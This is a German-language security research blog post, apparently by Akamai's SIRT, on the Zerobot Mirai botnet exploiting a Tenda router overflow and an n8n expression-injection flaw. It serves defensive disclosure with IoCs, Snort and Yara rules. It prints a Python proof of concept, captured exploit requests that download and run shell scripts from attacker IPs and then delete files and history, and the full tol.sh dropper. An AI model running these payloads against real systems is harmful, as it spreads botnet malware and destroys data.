Malware von Zerobot zielt auf die n8n-Automatisierungsplattform ab

Feb 27, 2026

Verfasser

Kyle Lefton ist Sicherheitsforscher im Security Intelligence Response Team von Akamai. Kyle war früher als Intelligence Analyst für das US-amerikanische Verteidigungsministerium tätig und verfügt über mehrere Jahre Erfahrung in den Bereichen Cybersicherheit, Bedrohungsforschung und Spionageabwehr. Es bereitet ihm Freude, neue Bedrohungen zu untersuchen, Schwachstellen zu erforschen und Bedrohungsgruppenzuordnungen zu erstellen. Abseits der Arbeit verbringt er gern Zeit mit Freunden und Familie, Strategiespielen und Wanderungen in der freien Natur.

Zusammenfassung

Das Security Intelligence and Response Team (SIRT) von Akamai hat eine aktive Ausnutzung der Command-Injection-SicherheitslückenCVE-2025-7544 und CVE-2025-68613 in Tenda-AC1206-Routern und der n8n-Automatisierungsplattform identifiziert.
Die SIRT hat diese Aktivitäten erstmals im Januar 2026 in unserem globalen Netzwerk von Honeypots festgestellt. Dies ist die erste gemeldete aktive Ausnutzung dieser Sicherheitslücken seitdem diese im Juli 2025 bzw. im Dezember 2025 erstmals publik gemacht wurden.
Wir haben in diesem Blogbeitrag eine Liste von Indikatoren für eine Kompromittierung (Indicators of Compromise, IoCs) zusammengestellt, um diese Bedrohung abzuwehren.

Direkt zu den IoCs

Einführung

Das Akamai SIRT entdeckte eine laufende Mirai-basierte Malware-Kampagne namens Zerobot, die auf verschiedene aktuelle CVEs abzielt, darunter auch jene, die Tenda AC1206-Router und die n8n-Plattform zur Workflow-Automatisierung betreffen. Die Botnet-Kampagne geht mindestens auf Anfang Dezember 2025 zurück. Mitte Januar 2026 wurden die jüngsten Exploits in unserem globalen Netzwerk von Honeypots identifiziert, um eine Mirai-Malware-Variante zu verbreiten.

Besonders interessant ist die gezielte Ansprache der n8n-Schwachstelle: Botnets nutzen in der Regel IoT-Geräte (Internets der Dinge) wie Sicherheitskameras, DVRs und Router, aber n8n fällt in eine ganz andere Kategorie.

Obwohl dies kein völlig neues Verhalten für Botnets ist, stellt diese Art von Anvisieren eine größere Gefahr für Unternehmen dar, da kritischere Infrastrukturen kompromittiert werden, da der n8n-Exploit für einen Bedrohungsakteur eine laterale Netzwerkbewegung ermöglichen könnte.

Anvisierte Schwachstellen

Die Beobachtungen des SIRT deuten darauf hin, dass Zerobot zwei verschiedene Schwachstellen ins Visier nimmt: CVE-2025-7544 und CVE-2025-68613. Die Zeitstempel ihrer Exploit-Versuche in unseren Honeypots waren nach der öffentlichen Bekanntgabe der CVEs, die bestätigen, dass diese Schwachstellen nicht Zero-Days waren.

Die opportunistische Ausnutzung von kürzlich bekannt gegebenen Schwachstellen durch Bedrohungsakteure ist heutzutage recht häufig. Selbst klug vorgehende Organisationen, die beim Patchen auf dem neuesten Stand sind, haben oft ein anfälliges Fenster nach der anfänglichen Offenlegung. Und einige Organisationen vernachlässigen das Patchen dieser Geräte gänzlich.

Details zu CVE-2025-7544

CVE-2025-7544, veröffentlicht Mitte Juli 2025, ist ein Remote-Stack-basierter Pufferüberlauf, der den Endpunkt /goform/setMacFilterCfg in Tenda-AC1206-Geräten mit Version 15.03.06.23 betrifft. Er wurde als kritisch eingestuft wurde und kann über den deviceList-Parameter ausgenutzt werden. Aufgrund der Funktion parse_macfilter_rule wird die Variable s (technisch gesehen v3) ohne Überprüfung ihrer Länge an die strcpy-Funktion übergeben, was zu einem Stapelüberlauf des stapelbasierten Puffers dest (s_2) führen kann.

Durch das Anfordern der Seite kann ein Angreifer auch aus der Ferne problemlos einen DoS-Angriff (Denial-of-Servcie) oder eine Remotecodeausführung (RCE) durchführen. Ein öffentlicher Proof of Concept (PoC) ist verfügbar, in dem die Schwachstelle und der Exploit detaillierter beschrieben werden (Abbildung 1).

import requests
ip = "192.168.0.1"
url = "http://" + ip + "/goform/setMacFilterCfg"
data = {
    "macFilterType": "white",
    "deviceList": "a" * 1000 + "\r" + "b" * 1000
}
response = requests.get(url, params=data)
print(response.text)

Abb. 1: CVE-2025-7544: PoC-Exploit

Details zu CVE-2025-68613

CVE-2025-68613 wurde Mitte Dezember 2025 veröffentlicht und ist eine RCE-Sicherheitslücke, die das Auswertungssystem für Workflow-Ausdrücke in der n8n Workflow-Automatisierungsplattform (in den Versionen 0.211.0 bis 1.20.4, dann 1.21.1 und 1.22.0) betrifft und als kritisch eingestuft wurde.

In n8n können Nutzer Ausdrücke in Workflows schreiben, um Daten dynamisch zu verarbeiten. Diese Ausdrücke wurden jedoch nicht mit dem richtigen Sandboxing ausgewertet. Dadurch können Angreifer den beabsichtigten Ausführungskontext verlassen, um beliebigen Code auf dem Server auszuführen. Durch Ausführen dieser Ausdrücke auf dem zugrunde liegenden System kann ein Angreifer auch Dateien auf dem Server lesen und schreiben, Umgebungsvariablen wie API-Schlüssel stehlen und Persistenz aufbauen.

Die Schwachstelle lässt sich leicht ausnutzen, erfordert nur eine Nutzeranmeldung ohne Administratorrechte und kann auf alle Daten zugreifen, auf die n8n Zugriff hat. Viele Unternehmen verwenden n8n für eine Vielzahl von Zwecken, wie die Integration von Datenbanken in Cloud-Dienste, die Automatisierung der Datenverarbeitung, die Verwaltung vertraulicher Daten und die Verbindung verschiedener Plattformen und interner Systeme. Für diese Schwachstelle ist auch ein öffentlicher PoC-Exploit verfügbar.

Aktive Ausnutzung von Tenda und n8n

Akamai SIRT hat seit Mitte Januar 2026 aktive Ausnutzungsversuche von CVE-2025-7544 durch Zerobot in unserem globalen Netzwerk von Honeypots entdeckt. Wie Sie in Abbildung 2 sehen können, löst der Exploit-Versuch den Pufferüberlauf durch die Verwendung von 500 „A“-Zeichen im deviceList-Parameter aus, der es ermöglicht, willkürlichen Code auszuführen. Der Exploit lädt dann ein schädliches Shell-Skript namens tol.sh von der in den USA ansässigen IP-Adresse 144.172.100.228 herunter und führt es aus.

/goform/setMacFilterCfg

macFilterType=black&deviceList=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod 777 /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/tol.sh; curl -O http://144.172.100[.]228/tol.sh; chmod 777 tol.sh; sh tol.sh; tftp 140.233.190.96 -c get tol.sh; chmod 777 tol.sh; sh tol.sh; tftp -r 3.sh -g 140.233.190.96; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 140.233.190.96 2.sh 2.sh; sh 2.sh; rm -rf tol.sh tol.sh 3.sh 2.sh; rm -rf *; history -c

Abb. 2: Ein Beispiel für einen aktiven Ausnutzungsversuch von CVE-2025-7544

Das SIRT stellte außerdem fest, dass Zerobot versuchte, eine der letzten n8n Schwachstellen auszunutzen: CVE-2025-68613 (Abbildung 3). Die Funktionalität ist weitgehend identisch mit dem anderen Exploit-Versuch, bei dem das tol.sh-Shell-Skript heruntergeladen und ausgeführt wird, um die Haupt-Mirai-Malware-Payload von zerobotv9 abzurufen und zu laden.

/rest/workflow/run

{"workflowData":{"nodes":[{"parameters":{"command":"cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod 777 /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/tol.sh; curl -O http://144.172.100[.]228/tol.sh; chmod 777 tol.sh; sh tol.sh; tftp 140.233.190.96 -c get tol.sh; chmod 777 tol.sh; sh tol.sh; tftp -r 3.sh -g 140.233.190.96; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 140.233.190.96 2.sh 2.sh; sh 2.sh; rm -rf tol.sh tol.sh 3.sh 2.sh; rm -rf *; history -c"},"name":"Exec","type":"n8n-nodes-base.executeCommand","typeVersion":1,"position":[100,100]}],"connections":{}}}

Abb. 3: Ein Beispiel für einen aktiven Ausnutzungsversuch von CVE-2025-68613

Obwohl das Anvisieren von n8n durch ein Mirai-basiertes Botnet nicht unbekannt ist, stellt es eine deutliche Abweichung von der typischen Nutzung von IoT-Geräten dar. Das Potenzial, dass ein Botnet in der kritischen Infrastruktur eines Unternehmens Zugang und Persistenz erlangt und möglicherweise laterale Netzwerkbewegungen nutzen kann, ist sicherlich ein Grund zur Sorge.

Zerobot-Botnet

Das Shell-Skript in Abbildung 4 ruft die Mirai-basierte Malware-Payload mit dem Namen zerobotv9 ab und führt sie aus. Diese Payload unterstützt eine Vielzahl verschiedener Architekturen, die für Mirai-Downloader üblich sind. Die UPX-verpackte Payload enthält eine Vielzahl von verschlüsselten Zeichenfolgen und Parametern, einschließlich einer hartcodierten Befehls- und Kontrolldomain von 0bot.qzz[.]io und der allgemeinen Mirai-Malware-Konsolen-Ausführungszeichenfolge, die in diesem Fall „bruh why again“ lautet.

Der Name Zerobot geht auf einen Artikel von Fortinet aus dem Jahr 2022 zurück, aber es ist unbekannt, ob die beteiligten Cyberkriminellen miteinander in Verbindung stehen. Die Nomenklatur deutet darauf hin, dass dies die neunte Iteration des Zerobot-Malware ist, aber wir haben keine Hinweise auf die acht anderen Versionen.

Abgesehen von der ersten Entdeckung im Jahr 2022 fanden wir öffentliche Malware-Beispiele mit dem Namen zerobotv2 aus dem August 2025, aber diese schienen die häufig verwendete Malware-Variante von LZRD-Mirai zu sein.

#!/bin/bash

ulimit -n 1024
cp /bin/busybox /tmp/
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86; chmod +x *; ./zerobotv9.x86 zerobotv9.x86; rm -rf zerobotv9.x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mips; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mips; chmod +x *; ./zerobotv9.mips zerobotv9.mips; rm -rf zerobotv9.mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arc; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arc; chmod +x *; ./zerobotv9.arc zerobotv9.arc; rm -rf zerobotv9.arc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.i686; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.i686; chmod +x *; ./zerobotv9.i686 zerobotv9.i686; rm -rf zerobotv9.i686
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86_64; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86_64; chmod +x *; ./zerobotv9.x86_64 zerobotv9.x86_64; rm -rf zerobotv9.x86_64
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mpsl; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mpsl; chmod +x *; ./zerobotv9.mpsl zerobotv9.mpsl; rm -rf zerobotv9.mpsl
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm; chmod +x *; ./zerobotv9.arm zerobotv9.arm; rm -rf zerobotv9.arm
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm5; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm5; chmod +x *; ./zerobotv9.arm5 zerobotv9.arm5; rm -rf zerobotv9.arm5
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm6; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm6; chmod +x *; ./zerobotv9.arm6 zerobotv9.arm6; rm -rf zerobotv9.arm6
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm7; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm7; chmod +x *; ./zerobotv9.arm7 zerobotv9.arm7; rm -rf zerobotv9.arm7
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.ppc; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.ppc; chmod +x *; ./zerobotv9.ppc zerobotv9.ppc; rm -rf zerobotv9.ppc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.spc; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.spc; chmod +x *; ./zerobotv9.spc zerobotv9.spc; rm -rf zerobotv9.spc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.m68k; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.m68k; chmod +x *; ./zerobotv9.m68k zerobotv9.m68k; rm -rf zerobotv9.m68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.sh4; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.sh4; chmod +x *; ./zerobotv9.sh4 zerobotv9.sh4; rm -rf zerobotv9.sh4

Abb. 4: Inhalt von tol.sh

Es gibt eine Vielzahl von Unterschieden zwischen der ursprünglichen 2022er Zerobot-Malware und den neueren zerobotv9-Proben. Der wichtigste Unterschied besteht darin, dass das Original in der Dateigröße viel größer ist und in Go geschrieben wird; zerobotv9 ist kleiner und nicht in Go geschrieben.

Wir fanden jedoch einige Proben mit Zerobot-Label aus der ursprünglichen Downloader-IP-Adresse vom Oktober 2022, die nicht in Go geschrieben wurden. Sowohl diese Version vom Oktober 2022 als auch Zerobotv9 verwenden dieselben ursprünglichen Mirai-Malware-XOR-Schlüssel 0XDEADBEEF oder 0x22.

Diese neuere Version hat auch verschiedene Angriffsfunktionen, die der alten fehlten, wie TCPXmas, Mixamp, SSH und eine Angriffsmethode namens Discord. Die hartcodierten Nutzeragents sind in Abbildung 5 zu sehen.

Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; Info Path.3; SV1; .NET CLR 3.4.53360; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94

Abb. 5: Hartcodierte Nutzeragents aus entschlüsselter Zerobotv9-Malware

Zusätzliche Ausnutzung

Obwohl die aktive Ausnutzung von Tenda-Geräten und der n8n-Plattform das Highlight dieses Blogbeitrags ist, beobachtete das SIRT auch, dass Zerobot auf mehrere andere Schwachstellen abzielt, darunter CVE-2017-9841 (Abbildung 6), CVE-2021-3129 (Abbildung 7) und CVE-2022-22947 (Abbildung 8).

Diese Versuche unterscheiden sich etwas von den hervorgehobenen Ausnutzungsversuchen, da sie netcat und socat verwenden, um eine rohe TCP-Verbindung zu öffnen und Daten vom Socket in stdout zu lesen, gefolgt von Befehlen zur Ausführung des Skripts, um in die Haupt-Mirai-Malware-Payload zu laden.

Die Cyberkriminellen verwendeten diese Methode auch auf den n8n- und Tenda-Schwachstellen und haben eine Reihe von Fallbacks, wie Perl-Socket, Bash-TCP-Umleitung, PHP-Socket und Python-Socket. Diese Technik wurde Anfang Dezember 2025 erstmals eingesetzt, bevor sie im Januar 2026 auf Tools wie curl und wget umstellte.

Fazit

Die Verbreitung von Mirai setzt sich leider fort, obwohl die Strafverfolgungsbehörden in jüngster Zeit wichtige Gegenmaßnahmen durchgesetzt haben. Dies liegt daran, weil die Einrichtung eines Mirai-basierten Botnets nicht sonderlich schwierig ist. Mit der Verlockung des schnellen Geldes – oder einfach des Nervenkitzels – kann ein relativ unerfahrener Cyberkrimineller einfach alten Mirai-Code mit einigen kleinen Änderungen wiederverwenden oder sogar mithilfe von KI-Tools wiederholen.

Die Forschung und Entwicklung zur Produktion von Zero-Day-Exploits ist ebenfalls nicht erforderlich, da die gezielte Ausrichtung auf kürzlich veröffentlichte CVEs oder veraltete Hardware, die von einigen Unternehmen für Upgrades vernachlässigt wird, sehr effektiv sein kann. Das mag zwar nicht zu einem riesigen Botnet führen, das so berüchtigt wird wie Aisuru, aber es kann den Betreibern dennoch einen gewissen Gewinn bringen und ihnen ermöglichen, länger unerkannt zu bleiben.

Die Offenlegung stellt einen Nettovorteil dar

Wie wir bereits berichtet haben, kann das CVE-Programm manchmal als zweischneidiges Schwert dienen, indem es Schwachstellen beleuchtet, die sonst von Bedrohungsakteuren unentdeckt geblieben wären. Obwohl wir der Ansicht sind, dass das Programm immer noch ein Vorteil für die Branche ist, ist es wichtig zu berücksichtigen, dass Cyberkriminelle diese Offenlegungen im Hinblick auf Ausnutzungschancen überwachen, bevor Unternehmen in der Lage sind, sie effektiv zu patchen.

Sowohl die von Zerobot ausgenutzten Tenda- als auch n8n-Schwachstellen verfügten über öffentliche PoC-Exploits, die die Einfachheit und Verbreitung der aktiven Ausnutzung drastisch erhöhen können. Insbesondere in Anbetracht der Tatsache, dass n8n manchmal in kritischeren Workflows von Unternehmen verwendet wird, wird dringend empfohlen, dass potenziell betroffene Unternehmen ihre Systeme so schnell wie möglich sichern und patchen, um sich vor dieser oder anderen Schadaktivitäten zu schützen.

Bleiben Sie auf dem Laufenden

Das Akamai SIRT wird Bedrohungen wie diese weiterhin überwachen und melden, sowohl für unsere Kunden als auch für die Sicherheitscommunity insgesamt. Besuchen Sie unsere Forschungs-Homepage und folgen Sie uns in den sozialen Medien, um über das SIRT und andere Veröffentlichung der Akamai Security Intelligence Group informiert zu werden.

IOCs

Wir haben eine Liste von IoCs sowie Snort- und Yara-Regeln zusammengestellt, um Sicherheitsteams zu unterstützen.

Snort-Regeln für schädliche IPs

alert ip any any -> [140.233.190.96, 144.172.100.228, 172.86.123.179, 216.126.227.101, 103.59.160.237] any (
    msg:"Possible Botnet Infrastructure Activity - Suspicious IP"; 
    sid:2000003; 
    rev:1; 
    threshold:type limit, track by_src, count 1, seconds 600; 
    classtype:trojan-activity; 
    metadata:service http, malware;
)

Snort-Regeln für die Erkennung der C2-Domainauflösung

alert http any any -> [0bot.qzz.io, andro.notemacro.com, pivot.notemacro.com] any (
    msg:"Possible Botnet C2 or Malware Distribution - Suspicious Domain"; 
    sid:2000002; rev:1; 
    classtype:trojan-activity; 
    metadata:service http, malware;
)

Yara-Regeln für Malware-Samples

rule Mirai_Malware_IOCs_1
{
    meta:
        description = "Detects files containing IOCs associated with potential Mirai malware"
        author = "Akamai SIRT"
        date = "2026-01-29"
        source = "Akamai SIRT"
        malware_family = "Mirai"
        version = "1.0"

    strings:
        $bruh = "bruh why again"
        $url1 = "mamakmukekkontol"
        $url2 = "inihiddenngentod"

        $ip1 = "140.233.190.96"
        $ip2 = "144.172.100.228"
        $ip3 = "172.86.123.179"
        $ip4 = "216.126.227.101"
        $ip5 = "103.59.160.237"

        $domain1 = "0bot.qzz.io"
        $domain2 = "andro.notemacro.com"
        $domain3 = “pivot.notemacro.com”

        $hash1 = "c8e8b627398ece071a3a148d6f38e46763dc534f9bfd967ebc8ac3479540111f"
        $hash2 = "360467c3b733513c922b90d0e222067509df6481636926fa1786d0273169f4da"
        $hash3 = "cc1efbca0da739b7784d833e56a22063ec4719cd095b16e3e10f77efd4277e24"
        $hash4 = "045a1e42cb64e4aa91601f65a80ec5bd040ea4024c6d3b051cb1a6aa15d03b57"
        $hash5 = "d024039824db6fe535ddd51bc81099c946871e4e280c48ed6e90dada79ccfcc7"
        $hash6 = "deb70af83a9b3bb8f9424b709c3f6342d0c63aa10e7f8df43dd7a457bda8f060"
        $hash7 = "6e4e797262c80b9117aded5d25ff2752cd83abe631096b66e120cc3599a82e4e"
        $hash8 = "2fdb2a092f71e4eba2a114364dc8044a7aa7f78b32658735c5375bf1e4e8ece3"
        $hash9 = "263a363e2483bf9fd9f915527f5b5255daa42bbfa1e606403169575d6555a58c"
        $hash10 = "d7112dd3220ccb0b3e757b006acf9b92af466a285bbb0674258bcc9ad463f616"

    condition:
        (
            $url1 or
            $url2 or
            $ip1 or
            $ip2 or
            $ip3 or
            $ip4 or
            $ip5 or
            $domain1 or
            $domain2 or
            $domain3 or
            $hash1 or
            $hash2 or
            $hash3 or
            $hash4 or
            $hash5 or
            $hash6 or
            $hash7 or
            $hash8 or
            $hash9 or
            $hash10
        )
}

Schädliche IPv4-Adressen

103.59.160.237

140.233.190.96

144.172.100.228

172.86.123.179

216.126.227.101

Schädliche Domains

0bot.qzz.io

andro.notemacro[.]com/inihiddenngentod/zerobotv9.*

pivot.notemacro.com/inihiddenngentod/zerobotv9.*

SHA256-Hashes

c8e8b627398ece071a3a148d6f38e46763dc534f9bfd967ebc8ac3479540111f

360467c3b733513c922b90d0e222067509df6481636926fa1786d0273169f4da

cc1efbca0da739b7784d833e56a22063ec4719cd095b16e3e10f77efd4277e24

045a1e42cb64e4aa91601f65a80ec5bd040ea4024c6d3b051cb1a6aa15d03b57

d024039824db6fe535ddd51bc81099c946871e4e280c48ed6e90dada79ccfcc7

deb70af83a9b3bb8f9424b709c3f6342d0c63aa10e7f8df43dd7a457bda8f060

6e4e797262c80b9117aded5d25ff2752cd83abe631096b66e120cc3599a82e4e

2fdb2a092f71e4eba2a114364dc8044a7aa7f78b32658735c5375bf1e4e8ece3

263a363e2483bf9fd9f915527f5b5255daa42bbfa1e606403169575d6555a58c

d7112dd3220ccb0b3e757b006acf9b92af466a285bbb0674258bcc9ad463f616

Mehr über Mirai erfahren